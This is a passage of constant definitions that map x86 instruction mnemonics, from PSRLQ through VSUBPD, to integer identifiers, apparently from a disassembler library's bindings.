X86_INS_PSRLQ = 434 
X86_INS_PSRLW = 435 X86_INS_PSUBB = 436 X86_INS_PSUBD = 437 X86_INS_PSUBQ = 438 X86_INS_PSUBSB = 439 X86_INS_PSUBSW = 440 X86_INS_PSUBUSB = 441 X86_INS_PSUBUSW = 442 X86_INS_PSUBW = 443 X86_INS_PUNPCKHBW = 444 X86_INS_PUNPCKHDQ = 445 X86_INS_PUNPCKHWD = 446 X86_INS_PUNPCKLBW = 447 X86_INS_PUNPCKLDQ = 448 X86_INS_PUNPCKLWD = 449 X86_INS_PXOR = 450 X86_INS_MONITOR = 451 X86_INS_MONTMUL = 452 X86_INS_MOV = 453 X86_INS_MOVABS = 454 X86_INS_MOVBE = 455 X86_INS_MOVDDUP = 456 X86_INS_MOVDQA = 457 X86_INS_MOVDQU = 458 X86_INS_MOVHLPS = 459 X86_INS_MOVHPD = 460 X86_INS_MOVHPS = 461 X86_INS_MOVLHPS = 462 X86_INS_MOVLPD = 463 X86_INS_MOVLPS = 464 X86_INS_MOVMSKPD = 465 X86_INS_MOVMSKPS = 466 X86_INS_MOVNTDQA = 467 X86_INS_MOVNTDQ = 468 X86_INS_MOVNTI = 469 X86_INS_MOVNTPD = 470 X86_INS_MOVNTPS = 471 X86_INS_MOVNTSD = 472 X86_INS_MOVNTSS = 473 X86_INS_MOVSB = 474 X86_INS_MOVSD = 475 X86_INS_MOVSHDUP = 476 X86_INS_MOVSLDUP = 477 X86_INS_MOVSQ = 478 X86_INS_MOVSS = 479 X86_INS_MOVSW = 480 X86_INS_MOVSX = 481 X86_INS_MOVSXD = 482 X86_INS_MOVUPD = 483 X86_INS_MOVUPS = 484 X86_INS_MOVZX = 485 X86_INS_MPSADBW = 486 X86_INS_MUL = 487 X86_INS_MULPD = 488 X86_INS_MULPS = 489 X86_INS_MULSD = 490 X86_INS_MULSS = 491 X86_INS_MULX = 492 X86_INS_FMUL = 493 X86_INS_FIMUL = 494 X86_INS_FMULP = 495 X86_INS_MWAIT = 496 X86_INS_NEG = 497 X86_INS_NOP = 498 X86_INS_NOT = 499 X86_INS_OUT = 500 X86_INS_OUTSB = 501 X86_INS_OUTSD = 502 X86_INS_OUTSW = 503 X86_INS_PACKUSDW = 504 X86_INS_PAUSE = 505 X86_INS_PAVGUSB = 506 X86_INS_PBLENDVB = 507 X86_INS_PBLENDW = 508 X86_INS_PCLMULQDQ = 509 X86_INS_PCMPEQQ = 510 X86_INS_PCMPESTRI = 511 X86_INS_PCMPESTRM = 512 X86_INS_PCMPGTQ = 513 X86_INS_PCMPISTRI = 514 X86_INS_PCMPISTRM = 515 X86_INS_PCOMMIT = 516 X86_INS_PDEP = 517 X86_INS_PEXT = 518 X86_INS_PEXTRB = 519 X86_INS_PEXTRD = 520 X86_INS_PEXTRQ = 521 X86_INS_PF2ID = 522 X86_INS_PF2IW = 523 X86_INS_PFACC = 524 X86_INS_PFADD = 525 X86_INS_PFCMPEQ = 526 X86_INS_PFCMPGE = 527 X86_INS_PFCMPGT = 528 X86_INS_PFMAX = 529 X86_INS_PFMIN = 530 X86_INS_PFMUL = 531 X86_INS_PFNACC = 532 X86_INS_PFPNACC = 533 X86_INS_PFRCPIT1 = 534 X86_INS_PFRCPIT2 = 535 X86_INS_PFRCP = 536 X86_INS_PFRSQIT1 = 537 X86_INS_PFRSQRT = 538 X86_INS_PFSUBR = 539 X86_INS_PFSUB = 540 X86_INS_PHMINPOSUW = 541 X86_INS_PI2FD = 542 X86_INS_PI2FW = 543 X86_INS_PINSRB = 544 X86_INS_PINSRD = 545 X86_INS_PINSRQ = 546 X86_INS_PMAXSB = 547 X86_INS_PMAXSD = 548 X86_INS_PMAXUD = 549 X86_INS_PMAXUW = 550 X86_INS_PMINSB = 551 X86_INS_PMINSD = 552 X86_INS_PMINUD = 553 X86_INS_PMINUW = 554 X86_INS_PMOVSXBD = 555 X86_INS_PMOVSXBQ = 556 X86_INS_PMOVSXBW = 557 X86_INS_PMOVSXDQ = 558 X86_INS_PMOVSXWD = 559 X86_INS_PMOVSXWQ = 560 X86_INS_PMOVZXBD = 561 X86_INS_PMOVZXBQ = 562 X86_INS_PMOVZXBW = 563 X86_INS_PMOVZXDQ = 564 X86_INS_PMOVZXWD = 565 X86_INS_PMOVZXWQ = 566 X86_INS_PMULDQ = 567 X86_INS_PMULHRW = 568 X86_INS_PMULLD = 569 X86_INS_POP = 570 X86_INS_POPAW = 571 X86_INS_POPAL = 572 X86_INS_POPCNT = 573 X86_INS_POPF = 574 X86_INS_POPFD = 575 X86_INS_POPFQ = 576 X86_INS_PREFETCH = 577 X86_INS_PREFETCHNTA = 578 X86_INS_PREFETCHT0 = 579 X86_INS_PREFETCHT1 = 580 X86_INS_PREFETCHT2 = 581 X86_INS_PREFETCHW = 582 X86_INS_PSHUFD = 583 X86_INS_PSHUFHW = 584 X86_INS_PSHUFLW = 585 X86_INS_PSLLDQ = 586 X86_INS_PSRLDQ = 587 X86_INS_PSWAPD = 588 X86_INS_PTEST = 589 X86_INS_PUNPCKHQDQ = 590 X86_INS_PUNPCKLQDQ = 591 X86_INS_PUSH = 592 X86_INS_PUSHAW = 593 X86_INS_PUSHAL = 594 X86_INS_PUSHF = 595 X86_INS_PUSHFD = 596 X86_INS_PUSHFQ = 597 X86_INS_RCL = 598 X86_INS_RCPPS = 599 X86_INS_RCPSS = 600 X86_INS_RCR 
= 601 X86_INS_RDFSBASE = 602 X86_INS_RDGSBASE = 603 X86_INS_RDMSR = 604 X86_INS_RDPMC = 605 X86_INS_RDRAND = 606 X86_INS_RDSEED = 607 X86_INS_RDTSC = 608 X86_INS_RDTSCP = 609 X86_INS_ROL = 610 X86_INS_ROR = 611 X86_INS_RORX = 612 X86_INS_ROUNDPD = 613 X86_INS_ROUNDPS = 614 X86_INS_ROUNDSD = 615 X86_INS_ROUNDSS = 616 X86_INS_RSM = 617 X86_INS_RSQRTPS = 618 X86_INS_RSQRTSS = 619 X86_INS_SAHF = 620 X86_INS_SAL = 621 X86_INS_SALC = 622 X86_INS_SAR = 623 X86_INS_SARX = 624 X86_INS_SBB = 625 X86_INS_SCASB = 626 X86_INS_SCASD = 627 X86_INS_SCASQ = 628 X86_INS_SCASW = 629 X86_INS_SETAE = 630 X86_INS_SETA = 631 X86_INS_SETBE = 632 X86_INS_SETB = 633 X86_INS_SETE = 634 X86_INS_SETGE = 635 X86_INS_SETG = 636 X86_INS_SETLE = 637 X86_INS_SETL = 638 X86_INS_SETNE = 639 X86_INS_SETNO = 640 X86_INS_SETNP = 641 X86_INS_SETNS = 642 X86_INS_SETO = 643 X86_INS_SETP = 644 X86_INS_SETS = 645 X86_INS_SFENCE = 646 X86_INS_SGDT = 647 X86_INS_SHA1MSG1 = 648 X86_INS_SHA1MSG2 = 649 X86_INS_SHA1NEXTE = 650 X86_INS_SHA1RNDS4 = 651 X86_INS_SHA256MSG1 = 652 X86_INS_SHA256MSG2 = 653 X86_INS_SHA256RNDS2 = 654 X86_INS_SHL = 655 X86_INS_SHLD = 656 X86_INS_SHLX = 657 X86_INS_SHR = 658 X86_INS_SHRD = 659 X86_INS_SHRX = 660 X86_INS_SHUFPD = 661 X86_INS_SHUFPS = 662 X86_INS_SIDT = 663 X86_INS_FSIN = 664 X86_INS_SKINIT = 665 X86_INS_SLDT = 666 X86_INS_SMSW = 667 X86_INS_SQRTPD = 668 X86_INS_SQRTPS = 669 X86_INS_SQRTSD = 670 X86_INS_SQRTSS = 671 X86_INS_FSQRT = 672 X86_INS_STAC = 673 X86_INS_STC = 674 X86_INS_STD = 675 X86_INS_STGI = 676 X86_INS_STI = 677 X86_INS_STMXCSR = 678 X86_INS_STOSB = 679 X86_INS_STOSD = 680 X86_INS_STOSQ = 681 X86_INS_STOSW = 682 X86_INS_STR = 683 X86_INS_FST = 684 X86_INS_FSTP = 685 X86_INS_FSTPNCE = 686 X86_INS_FXCH = 687 X86_INS_SUBPD = 688 X86_INS_SUBPS = 689 X86_INS_FSUBR = 690 X86_INS_FISUBR = 691 X86_INS_FSUBRP = 692 X86_INS_SUBSD = 693 X86_INS_SUBSS = 694 X86_INS_FSUB = 695 X86_INS_FISUB = 696 X86_INS_FSUBP = 697 X86_INS_SWAPGS = 698 X86_INS_SYSCALL = 699 X86_INS_SYSENTER = 700 X86_INS_SYSEXIT = 701 X86_INS_SYSRET = 702 X86_INS_T1MSKC = 703 X86_INS_TEST = 704 X86_INS_UD2 = 705 X86_INS_FTST = 706 X86_INS_TZCNT = 707 X86_INS_TZMSK = 708 X86_INS_FUCOMPI = 709 X86_INS_FUCOMI = 710 X86_INS_FUCOMPP = 711 X86_INS_FUCOMP = 712 X86_INS_FUCOM = 713 X86_INS_UD2B = 714 X86_INS_UNPCKHPD = 715 X86_INS_UNPCKHPS = 716 X86_INS_UNPCKLPD = 717 X86_INS_UNPCKLPS = 718 X86_INS_VADDPD = 719 X86_INS_VADDPS = 720 X86_INS_VADDSD = 721 X86_INS_VADDSS = 722 X86_INS_VADDSUBPD = 723 X86_INS_VADDSUBPS = 724 X86_INS_VAESDECLAST = 725 X86_INS_VAESDEC = 726 X86_INS_VAESENCLAST = 727 X86_INS_VAESENC = 728 X86_INS_VAESIMC = 729 X86_INS_VAESKEYGENASSIST = 730 X86_INS_VALIGND = 731 X86_INS_VALIGNQ = 732 X86_INS_VANDNPD = 733 X86_INS_VANDNPS = 734 X86_INS_VANDPD = 735 X86_INS_VANDPS = 736 X86_INS_VBLENDMPD = 737 X86_INS_VBLENDMPS = 738 X86_INS_VBLENDPD = 739 X86_INS_VBLENDPS = 740 X86_INS_VBLENDVPD = 741 X86_INS_VBLENDVPS = 742 X86_INS_VBROADCASTF128 = 743 X86_INS_VBROADCASTI32X4 = 744 X86_INS_VBROADCASTI64X4 = 745 X86_INS_VBROADCASTSD = 746 X86_INS_VBROADCASTSS = 747 X86_INS_VCMPPD = 748 X86_INS_VCMPPS = 749 X86_INS_VCMPSD = 750 X86_INS_VCMPSS = 751 X86_INS_VCOMPRESSPD = 752 X86_INS_VCOMPRESSPS = 753 X86_INS_VCVTDQ2PD = 754 X86_INS_VCVTDQ2PS = 755 X86_INS_VCVTPD2DQX = 756 X86_INS_VCVTPD2DQ = 757 X86_INS_VCVTPD2PSX = 758 X86_INS_VCVTPD2PS = 759 X86_INS_VCVTPD2UDQ = 760 X86_INS_VCVTPH2PS = 761 X86_INS_VCVTPS2DQ = 762 X86_INS_VCVTPS2PD = 763 X86_INS_VCVTPS2PH = 764 X86_INS_VCVTPS2UDQ = 765 X86_INS_VCVTSD2SI = 766 X86_INS_VCVTSD2USI = 767 
X86_INS_VCVTSS2SI = 768 X86_INS_VCVTSS2USI = 769 X86_INS_VCVTTPD2DQX = 770 X86_INS_VCVTTPD2DQ = 771 X86_INS_VCVTTPD2UDQ = 772 X86_INS_VCVTTPS2DQ = 773 X86_INS_VCVTTPS2UDQ = 774 X86_INS_VCVTUDQ2PD = 775 X86_INS_VCVTUDQ2PS = 776 X86_INS_VDIVPD = 777 X86_INS_VDIVPS = 778 X86_INS_VDIVSD = 779 X86_INS_VDIVSS = 780 X86_INS_VDPPD = 781 X86_INS_VDPPS = 782 X86_INS_VERR = 783 X86_INS_VERW = 784 X86_INS_VEXP2PD = 785 X86_INS_VEXP2PS = 786 X86_INS_VEXPANDPD = 787 X86_INS_VEXPANDPS = 788 X86_INS_VEXTRACTF128 = 789 X86_INS_VEXTRACTF32X4 = 790 X86_INS_VEXTRACTF64X4 = 791 X86_INS_VEXTRACTI128 = 792 X86_INS_VEXTRACTI32X4 = 793 X86_INS_VEXTRACTI64X4 = 794 X86_INS_VEXTRACTPS = 795 X86_INS_VFMADD132PD = 796 X86_INS_VFMADD132PS = 797 X86_INS_VFMADDPD = 798 X86_INS_VFMADD213PD = 799 X86_INS_VFMADD231PD = 800 X86_INS_VFMADDPS = 801 X86_INS_VFMADD213PS = 802 X86_INS_VFMADD231PS = 803 X86_INS_VFMADDSD = 804 X86_INS_VFMADD213SD = 805 X86_INS_VFMADD132SD = 806 X86_INS_VFMADD231SD = 807 X86_INS_VFMADDSS = 808 X86_INS_VFMADD213SS = 809 X86_INS_VFMADD132SS = 810 X86_INS_VFMADD231SS = 811 X86_INS_VFMADDSUB132PD = 812 X86_INS_VFMADDSUB132PS = 813 X86_INS_VFMADDSUBPD = 814 X86_INS_VFMADDSUB213PD = 815 X86_INS_VFMADDSUB231PD = 816 X86_INS_VFMADDSUBPS = 817 X86_INS_VFMADDSUB213PS = 818 X86_INS_VFMADDSUB231PS = 819 X86_INS_VFMSUB132PD = 820 X86_INS_VFMSUB132PS = 821 X86_INS_VFMSUBADD132PD = 822 X86_INS_VFMSUBADD132PS = 823 X86_INS_VFMSUBADDPD = 824 X86_INS_VFMSUBADD213PD = 825 X86_INS_VFMSUBADD231PD = 826 X86_INS_VFMSUBADDPS = 827 X86_INS_VFMSUBADD213PS = 828 X86_INS_VFMSUBADD231PS = 829 X86_INS_VFMSUBPD = 830 X86_INS_VFMSUB213PD = 831 X86_INS_VFMSUB231PD = 832 X86_INS_VFMSUBPS = 833 X86_INS_VFMSUB213PS = 834 X86_INS_VFMSUB231PS = 835 X86_INS_VFMSUBSD = 836 X86_INS_VFMSUB213SD = 837 X86_INS_VFMSUB132SD = 838 X86_INS_VFMSUB231SD = 839 X86_INS_VFMSUBSS = 840 X86_INS_VFMSUB213SS = 841 X86_INS_VFMSUB132SS = 842 X86_INS_VFMSUB231SS = 843 X86_INS_VFNMADD132PD = 844 X86_INS_VFNMADD132PS = 845 X86_INS_VFNMADDPD = 846 X86_INS_VFNMADD213PD = 847 X86_INS_VFNMADD231PD = 848 X86_INS_VFNMADDPS = 849 X86_INS_VFNMADD213PS = 850 X86_INS_VFNMADD231PS = 851 X86_INS_VFNMADDSD = 852 X86_INS_VFNMADD213SD = 853 X86_INS_VFNMADD132SD = 854 X86_INS_VFNMADD231SD = 855 X86_INS_VFNMADDSS = 856 X86_INS_VFNMADD213SS = 857 X86_INS_VFNMADD132SS = 858 X86_INS_VFNMADD231SS = 859 X86_INS_VFNMSUB132PD = 860 X86_INS_VFNMSUB132PS = 861 X86_INS_VFNMSUBPD = 862 X86_INS_VFNMSUB213PD = 863 X86_INS_VFNMSUB231PD = 864 X86_INS_VFNMSUBPS = 865 X86_INS_VFNMSUB213PS = 866 X86_INS_VFNMSUB231PS = 867 X86_INS_VFNMSUBSD = 868 X86_INS_VFNMSUB213SD = 869 X86_INS_VFNMSUB132SD = 870 X86_INS_VFNMSUB231SD = 871 X86_INS_VFNMSUBSS = 872 X86_INS_VFNMSUB213SS = 873 X86_INS_VFNMSUB132SS = 874 X86_INS_VFNMSUB231SS = 875 X86_INS_VFRCZPD = 876 X86_INS_VFRCZPS = 877 X86_INS_VFRCZSD = 878 X86_INS_VFRCZSS = 879 X86_INS_VORPD = 880 X86_INS_VORPS = 881 X86_INS_VXORPD = 882 X86_INS_VXORPS = 883 X86_INS_VGATHERDPD = 884 X86_INS_VGATHERDPS = 885 X86_INS_VGATHERPF0DPD = 886 X86_INS_VGATHERPF0DPS = 887 X86_INS_VGATHERPF0QPD = 888 X86_INS_VGATHERPF0QPS = 889 X86_INS_VGATHERPF1DPD = 890 X86_INS_VGATHERPF1DPS = 891 X86_INS_VGATHERPF1QPD = 892 X86_INS_VGATHERPF1QPS = 893 X86_INS_VGATHERQPD = 894 X86_INS_VGATHERQPS = 895 X86_INS_VHADDPD = 896 X86_INS_VHADDPS = 897 X86_INS_VHSUBPD = 898 X86_INS_VHSUBPS = 899 X86_INS_VINSERTF128 = 900 X86_INS_VINSERTF32X4 = 901 X86_INS_VINSERTF32X8 = 902 X86_INS_VINSERTF64X2 = 903 X86_INS_VINSERTF64X4 = 904 X86_INS_VINSERTI128 = 905 X86_INS_VINSERTI32X4 = 906 
X86_INS_VINSERTI32X8 = 907 X86_INS_VINSERTI64X2 = 908 X86_INS_VINSERTI64X4 = 909 X86_INS_VINSERTPS = 910 X86_INS_VLDDQU = 911 X86_INS_VLDMXCSR = 912 X86_INS_VMASKMOVDQU = 913 X86_INS_VMASKMOVPD = 914 X86_INS_VMASKMOVPS = 915 X86_INS_VMAXPD = 916 X86_INS_VMAXPS = 917 X86_INS_VMAXSD = 918 X86_INS_VMAXSS = 919 X86_INS_VMCALL = 920 X86_INS_VMCLEAR = 921 X86_INS_VMFUNC = 922 X86_INS_VMINPD = 923 X86_INS_VMINPS = 924 X86_INS_VMINSD = 925 X86_INS_VMINSS = 926 X86_INS_VMLAUNCH = 927 X86_INS_VMLOAD = 928 X86_INS_VMMCALL = 929 X86_INS_VMOVQ = 930 X86_INS_VMOVDDUP = 931 X86_INS_VMOVD = 932 X86_INS_VMOVDQA32 = 933 X86_INS_VMOVDQA64 = 934 X86_INS_VMOVDQA = 935 X86_INS_VMOVDQU16 = 936 X86_INS_VMOVDQU32 = 937 X86_INS_VMOVDQU64 = 938 X86_INS_VMOVDQU8 = 939 X86_INS_VMOVDQU = 940 X86_INS_VMOVHLPS = 941 X86_INS_VMOVHPD = 942 X86_INS_VMOVHPS = 943 X86_INS_VMOVLHPS = 944 X86_INS_VMOVLPD = 945 X86_INS_VMOVLPS = 946 X86_INS_VMOVMSKPD = 947 X86_INS_VMOVMSKPS = 948 X86_INS_VMOVNTDQA = 949 X86_INS_VMOVNTDQ = 950 X86_INS_VMOVNTPD = 951 X86_INS_VMOVNTPS = 952 X86_INS_VMOVSD = 953 X86_INS_VMOVSHDUP = 954 X86_INS_VMOVSLDUP = 955 X86_INS_VMOVSS = 956 X86_INS_VMOVUPD = 957 X86_INS_VMOVUPS = 958 X86_INS_VMPSADBW = 959 X86_INS_VMPTRLD = 960 X86_INS_VMPTRST = 961 X86_INS_VMREAD = 962 X86_INS_VMRESUME = 963 X86_INS_VMRUN = 964 X86_INS_VMSAVE = 965 X86_INS_VMULPD = 966 X86_INS_VMULPS = 967 X86_INS_VMULSD = 968 X86_INS_VMULSS = 969 X86_INS_VMWRITE = 970 X86_INS_VMXOFF = 971 X86_INS_VMXON = 972 X86_INS_VPABSB = 973 X86_INS_VPABSD = 974 X86_INS_VPABSQ = 975 X86_INS_VPABSW = 976 X86_INS_VPACKSSDW = 977 X86_INS_VPACKSSWB = 978 X86_INS_VPACKUSDW = 979 X86_INS_VPACKUSWB = 980 X86_INS_VPADDB = 981 X86_INS_VPADDD = 982 X86_INS_VPADDQ = 983 X86_INS_VPADDSB = 984 X86_INS_VPADDSW = 985 X86_INS_VPADDUSB = 986 X86_INS_VPADDUSW = 987 X86_INS_VPADDW = 988 X86_INS_VPALIGNR = 989 X86_INS_VPANDD = 990 X86_INS_VPANDND = 991 X86_INS_VPANDNQ = 992 X86_INS_VPANDN = 993 X86_INS_VPANDQ = 994 X86_INS_VPAND = 995 X86_INS_VPAVGB = 996 X86_INS_VPAVGW = 997 X86_INS_VPBLENDD = 998 X86_INS_VPBLENDMB = 999 X86_INS_VPBLENDMD = 1000 X86_INS_VPBLENDMQ = 1001 X86_INS_VPBLENDMW = 1002 X86_INS_VPBLENDVB = 1003 X86_INS_VPBLENDW = 1004 X86_INS_VPBROADCASTB = 1005 X86_INS_VPBROADCASTD = 1006 X86_INS_VPBROADCASTMB2Q = 1007 X86_INS_VPBROADCASTMW2D = 1008 X86_INS_VPBROADCASTQ = 1009 X86_INS_VPBROADCASTW = 1010 X86_INS_VPCLMULQDQ = 1011 X86_INS_VPCMOV = 1012 X86_INS_VPCMPB = 1013 X86_INS_VPCMPD = 1014 X86_INS_VPCMPEQB = 1015 X86_INS_VPCMPEQD = 1016 X86_INS_VPCMPEQQ = 1017 X86_INS_VPCMPEQW = 1018 X86_INS_VPCMPESTRI = 1019 X86_INS_VPCMPESTRM = 1020 X86_INS_VPCMPGTB = 1021 X86_INS_VPCMPGTD = 1022 X86_INS_VPCMPGTQ = 1023 X86_INS_VPCMPGTW = 1024 X86_INS_VPCMPISTRI = 1025 X86_INS_VPCMPISTRM = 1026 X86_INS_VPCMPQ = 1027 X86_INS_VPCMPUB = 1028 X86_INS_VPCMPUD = 1029 X86_INS_VPCMPUQ = 1030 X86_INS_VPCMPUW = 1031 X86_INS_VPCMPW = 1032 X86_INS_VPCOMB = 1033 X86_INS_VPCOMD = 1034 X86_INS_VPCOMPRESSD = 1035 X86_INS_VPCOMPRESSQ = 1036 X86_INS_VPCOMQ = 1037 X86_INS_VPCOMUB = 1038 X86_INS_VPCOMUD = 1039 X86_INS_VPCOMUQ = 1040 X86_INS_VPCOMUW = 1041 X86_INS_VPCOMW = 1042 X86_INS_VPCONFLICTD = 1043 X86_INS_VPCONFLICTQ = 1044 X86_INS_VPERM2F128 = 1045 X86_INS_VPERM2I128 = 1046 X86_INS_VPERMD = 1047 X86_INS_VPERMI2D = 1048 X86_INS_VPERMI2PD = 1049 X86_INS_VPERMI2PS = 1050 X86_INS_VPERMI2Q = 1051 X86_INS_VPERMIL2PD = 1052 X86_INS_VPERMIL2PS = 1053 X86_INS_VPERMILPD = 1054 X86_INS_VPERMILPS = 1055 X86_INS_VPERMPD = 1056 X86_INS_VPERMPS = 1057 X86_INS_VPERMQ = 1058 X86_INS_VPERMT2D = 1059 
X86_INS_VPERMT2PD = 1060 X86_INS_VPERMT2PS = 1061 X86_INS_VPERMT2Q = 1062 X86_INS_VPEXPANDD = 1063 X86_INS_VPEXPANDQ = 1064 X86_INS_VPEXTRB = 1065 X86_INS_VPEXTRD = 1066 X86_INS_VPEXTRQ = 1067 X86_INS_VPEXTRW = 1068 X86_INS_VPGATHERDD = 1069 X86_INS_VPGATHERDQ = 1070 X86_INS_VPGATHERQD = 1071 X86_INS_VPGATHERQQ = 1072 X86_INS_VPHADDBD = 1073 X86_INS_VPHADDBQ = 1074 X86_INS_VPHADDBW = 1075 X86_INS_VPHADDDQ = 1076 X86_INS_VPHADDD = 1077 X86_INS_VPHADDSW = 1078 X86_INS_VPHADDUBD = 1079 X86_INS_VPHADDUBQ = 1080 X86_INS_VPHADDUBW = 1081 X86_INS_VPHADDUDQ = 1082 X86_INS_VPHADDUWD = 1083 X86_INS_VPHADDUWQ = 1084 X86_INS_VPHADDWD = 1085 X86_INS_VPHADDWQ = 1086 X86_INS_VPHADDW = 1087 X86_INS_VPHMINPOSUW = 1088 X86_INS_VPHSUBBW = 1089 X86_INS_VPHSUBDQ = 1090 X86_INS_VPHSUBD = 1091 X86_INS_VPHSUBSW = 1092 X86_INS_VPHSUBWD = 1093 X86_INS_VPHSUBW = 1094 X86_INS_VPINSRB = 1095 X86_INS_VPINSRD = 1096 X86_INS_VPINSRQ = 1097 X86_INS_VPINSRW = 1098 X86_INS_VPLZCNTD = 1099 X86_INS_VPLZCNTQ = 1100 X86_INS_VPMACSDD = 1101 X86_INS_VPMACSDQH = 1102 X86_INS_VPMACSDQL = 1103 X86_INS_VPMACSSDD = 1104 X86_INS_VPMACSSDQH = 1105 X86_INS_VPMACSSDQL = 1106 X86_INS_VPMACSSWD = 1107 X86_INS_VPMACSSWW = 1108 X86_INS_VPMACSWD = 1109 X86_INS_VPMACSWW = 1110 X86_INS_VPMADCSSWD = 1111 X86_INS_VPMADCSWD = 1112 X86_INS_VPMADDUBSW = 1113 X86_INS_VPMADDWD = 1114 X86_INS_VPMASKMOVD = 1115 X86_INS_VPMASKMOVQ = 1116 X86_INS_VPMAXSB = 1117 X86_INS_VPMAXSD = 1118 X86_INS_VPMAXSQ = 1119 X86_INS_VPMAXSW = 1120 X86_INS_VPMAXUB = 1121 X86_INS_VPMAXUD = 1122 X86_INS_VPMAXUQ = 1123 X86_INS_VPMAXUW = 1124 X86_INS_VPMINSB = 1125 X86_INS_VPMINSD = 1126 X86_INS_VPMINSQ = 1127 X86_INS_VPMINSW = 1128 X86_INS_VPMINUB = 1129 X86_INS_VPMINUD = 1130 X86_INS_VPMINUQ = 1131 X86_INS_VPMINUW = 1132 X86_INS_VPMOVDB = 1133 X86_INS_VPMOVDW = 1134 X86_INS_VPMOVM2B = 1135 X86_INS_VPMOVM2D = 1136 X86_INS_VPMOVM2Q = 1137 X86_INS_VPMOVM2W = 1138 X86_INS_VPMOVMSKB = 1139 X86_INS_VPMOVQB = 1140 X86_INS_VPMOVQD = 1141 X86_INS_VPMOVQW = 1142 X86_INS_VPMOVSDB = 1143 X86_INS_VPMOVSDW = 1144 X86_INS_VPMOVSQB = 1145 X86_INS_VPMOVSQD = 1146 X86_INS_VPMOVSQW = 1147 X86_INS_VPMOVSXBD = 1148 X86_INS_VPMOVSXBQ = 1149 X86_INS_VPMOVSXBW = 1150 X86_INS_VPMOVSXDQ = 1151 X86_INS_VPMOVSXWD = 1152 X86_INS_VPMOVSXWQ = 1153 X86_INS_VPMOVUSDB = 1154 X86_INS_VPMOVUSDW = 1155 X86_INS_VPMOVUSQB = 1156 X86_INS_VPMOVUSQD = 1157 X86_INS_VPMOVUSQW = 1158 X86_INS_VPMOVZXBD = 1159 X86_INS_VPMOVZXBQ = 1160 X86_INS_VPMOVZXBW = 1161 X86_INS_VPMOVZXDQ = 1162 X86_INS_VPMOVZXWD = 1163 X86_INS_VPMOVZXWQ = 1164 X86_INS_VPMULDQ = 1165 X86_INS_VPMULHRSW = 1166 X86_INS_VPMULHUW = 1167 X86_INS_VPMULHW = 1168 X86_INS_VPMULLD = 1169 X86_INS_VPMULLQ = 1170 X86_INS_VPMULLW = 1171 X86_INS_VPMULUDQ = 1172 X86_INS_VPORD = 1173 X86_INS_VPORQ = 1174 X86_INS_VPOR = 1175 X86_INS_VPPERM = 1176 X86_INS_VPROTB = 1177 X86_INS_VPROTD = 1178 X86_INS_VPROTQ = 1179 X86_INS_VPROTW = 1180 X86_INS_VPSADBW = 1181 X86_INS_VPSCATTERDD = 1182 X86_INS_VPSCATTERDQ = 1183 X86_INS_VPSCATTERQD = 1184 X86_INS_VPSCATTERQQ = 1185 X86_INS_VPSHAB = 1186 X86_INS_VPSHAD = 1187 X86_INS_VPSHAQ = 1188 X86_INS_VPSHAW = 1189 X86_INS_VPSHLB = 1190 X86_INS_VPSHLD = 1191 X86_INS_VPSHLQ = 1192 X86_INS_VPSHLW = 1193 X86_INS_VPSHUFB = 1194 X86_INS_VPSHUFD = 1195 X86_INS_VPSHUFHW = 1196 X86_INS_VPSHUFLW = 1197 X86_INS_VPSIGNB = 1198 X86_INS_VPSIGND = 1199 X86_INS_VPSIGNW = 1200 X86_INS_VPSLLDQ = 1201 X86_INS_VPSLLD = 1202 X86_INS_VPSLLQ = 1203 X86_INS_VPSLLVD = 1204 X86_INS_VPSLLVQ = 1205 X86_INS_VPSLLW = 1206 X86_INS_VPSRAD = 1207 X86_INS_VPSRAQ = 1208 
X86_INS_VPSRAVD = 1209 X86_INS_VPSRAVQ = 1210 X86_INS_VPSRAW = 1211 X86_INS_VPSRLDQ = 1212 X86_INS_VPSRLD = 1213 X86_INS_VPSRLQ = 1214 X86_INS_VPSRLVD = 1215 X86_INS_VPSRLVQ = 1216 X86_INS_VPSRLW = 1217 X86_INS_VPSUBB = 1218 X86_INS_VPSUBD = 1219 X86_INS_VPSUBQ = 1220 X86_INS_VPSUBSB = 1221 X86_INS_VPSUBSW = 1222 X86_INS_VPSUBUSB = 1223 X86_INS_VPSUBUSW = 1224 X86_INS_VPSUBW = 1225 X86_INS_VPTESTMD = 1226 X86_INS_VPTESTMQ = 1227 X86_INS_VPTESTNMD = 1228 X86_INS_VPTESTNMQ = 1229 X86_INS_VPTEST = 1230 X86_INS_VPUNPCKHBW = 1231 X86_INS_VPUNPCKHDQ = 1232 X86_INS_VPUNPCKHQDQ = 1233 X86_INS_VPUNPCKHWD = 1234 X86_INS_VPUNPCKLBW = 1235 X86_INS_VPUNPCKLDQ = 1236 X86_INS_VPUNPCKLQDQ = 1237 X86_INS_VPUNPCKLWD = 1238 X86_INS_VPXORD = 1239 X86_INS_VPXORQ = 1240 X86_INS_VPXOR = 1241 X86_INS_VRCP14PD = 1242 X86_INS_VRCP14PS = 1243 X86_INS_VRCP14SD = 1244 X86_INS_VRCP14SS = 1245 X86_INS_VRCP28PD = 1246 X86_INS_VRCP28PS = 1247 X86_INS_VRCP28SD = 1248 X86_INS_VRCP28SS = 1249 X86_INS_VRCPPS = 1250 X86_INS_VRCPSS = 1251 X86_INS_VRNDSCALEPD = 1252 X86_INS_VRNDSCALEPS = 1253 X86_INS_VRNDSCALESD = 1254 X86_INS_VRNDSCALESS = 1255 X86_INS_VROUNDPD = 1256 X86_INS_VROUNDPS = 1257 X86_INS_VROUNDSD = 1258 X86_INS_VROUNDSS = 1259 X86_INS_VRSQRT14PD = 1260 X86_INS_VRSQRT14PS = 1261 X86_INS_VRSQRT14SD = 1262 X86_INS_VRSQRT14SS = 1263 X86_INS_VRSQRT28PD = 1264 X86_INS_VRSQRT28PS = 1265 X86_INS_VRSQRT28SD = 1266 X86_INS_VRSQRT28SS = 1267 X86_INS_VRSQRTPS = 1268 X86_INS_VRSQRTSS = 1269 X86_INS_VSCATTERDPD = 1270 X86_INS_VSCATTERDPS = 1271 X86_INS_VSCATTERPF0DPD = 1272 X86_INS_VSCATTERPF0DPS = 1273 X86_INS_VSCATTERPF0QPD = 1274 X86_INS_VSCATTERPF0QPS = 1275 X86_INS_VSCATTERPF1DPD = 1276 X86_INS_VSCATTERPF1DPS = 1277 X86_INS_VSCATTERPF1QPD = 1278 X86_INS_VSCATTERPF1QPS = 1279 X86_INS_VSCATTERQPD = 1280 X86_INS_VSCATTERQPS = 1281 X86_INS_VSHUFPD = 1282 X86_INS_VSHUFPS = 1283 X86_INS_VSQRTPD = 1284 X86_INS_VSQRTPS = 1285 X86_INS_VSQRTSD = 1286 X86_INS_VSQRTSS = 1287 X86_INS_VSTMXCSR = 1288 X86_INS_VSUBPD = 1289 